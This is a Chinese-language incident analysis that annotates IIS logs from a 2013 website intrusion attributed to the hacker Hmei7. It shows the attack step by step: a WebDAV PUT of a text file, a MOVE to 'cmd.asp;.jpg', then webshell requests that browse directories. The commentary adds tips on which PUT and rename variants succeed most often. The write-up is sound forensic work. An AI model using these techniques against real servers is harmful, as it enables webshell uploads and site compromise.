在东南亚有个自称匿名者组织的黑客Hmei7,其入侵网站数量非常多。但是其手法除了IIS PUT
就是爆破Joomla后台。
这是习科所截获的被入侵网站的日志(加注释)
2013-01-06 14:42:40 PUT /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 201 0 0 #### 这个93开头的挨批估计是代理,开着类似于Nessus的东西,或者是脚本,怀疑是.Net程序 2013-01-06 14:42:49 PUT /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 #### 201的是Created,意思就是创建成功。咱直接看这个x.txt的第3次吧,GET得到200,就是确认已经创建成功的。 2013-01-06 14:42:49 GET /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 #### 第1次GET是程序自动确认,第2次估计是手动了。 2013-01-06 14:43:06 GET /x.txt - 80 - 69.42.222.15 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) 200 0 0 #### 69.42.222.15这个米国的ip是代理挨批,这个马来的挨批118.100.232.48就是真身了 2013-01-06 14:45:27 PUT /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/5.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C) 201 0 0 #### 把webshell命名为txt往上面PUT了 2013-01-06 14:45:27 MOVE /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/5.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C) 201 0 0 #### 通常都是无法直接PUT一个.asp后缀的文件,所以可以put为txt,然后copy或者move为asp,成功率最高的put就是put一个txt,然后copy为.asa;后缀的文件 #### 当然,直接PUT一个asa;.txt也是有成功率的,这里不举一反三了
继续看日志:
2013-01-06 16:01:48 PUT /byHmei7.txt - 80 - 78.161.121.24 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022;+.NET4.0C;+.NET4.0E) 201 0 0 2013-01-06 16:01:48 MOVE /byHmei7.txt - 80 - 78.161.121.24 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022;+.NET4.0C;+.NET4.0E) 201 0 0 2013-01-06 16:02:41 GET /cmd.asp;.jpg - 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0 2013-01-06 16:04:17 GET /cmd.asp;.jpg raiz=D:\wwwroot 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0 2013-01-06 16:05:31 GET /cmd.asp;.jpg raiz=D:\wwwroot\web 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0 2013-01-06 16:05:40 GET /cmd.asp;.jpg action=mass&massact=dfc&path=D:|wwwroot| 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0 2013-01-06 16:05:51 POST /cmd.asp;.jpg action=mass&massact=dfc 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0 2013-01-06 16:06:03 GET /cmd.asp;.jpg raiz=D: 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 121 2013-01-06 16:07:10 GET /cmd.asp;.jpg action=mass&massact=dfc&path=D:|wwwroot|crystalstar| 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
先PUT一个byHmei7.txt的asp大马,然后move为cmd.asp;.jpg,Hmei7它在78.161.121.24上面用来PUT的程序应该是个C#.net的程序。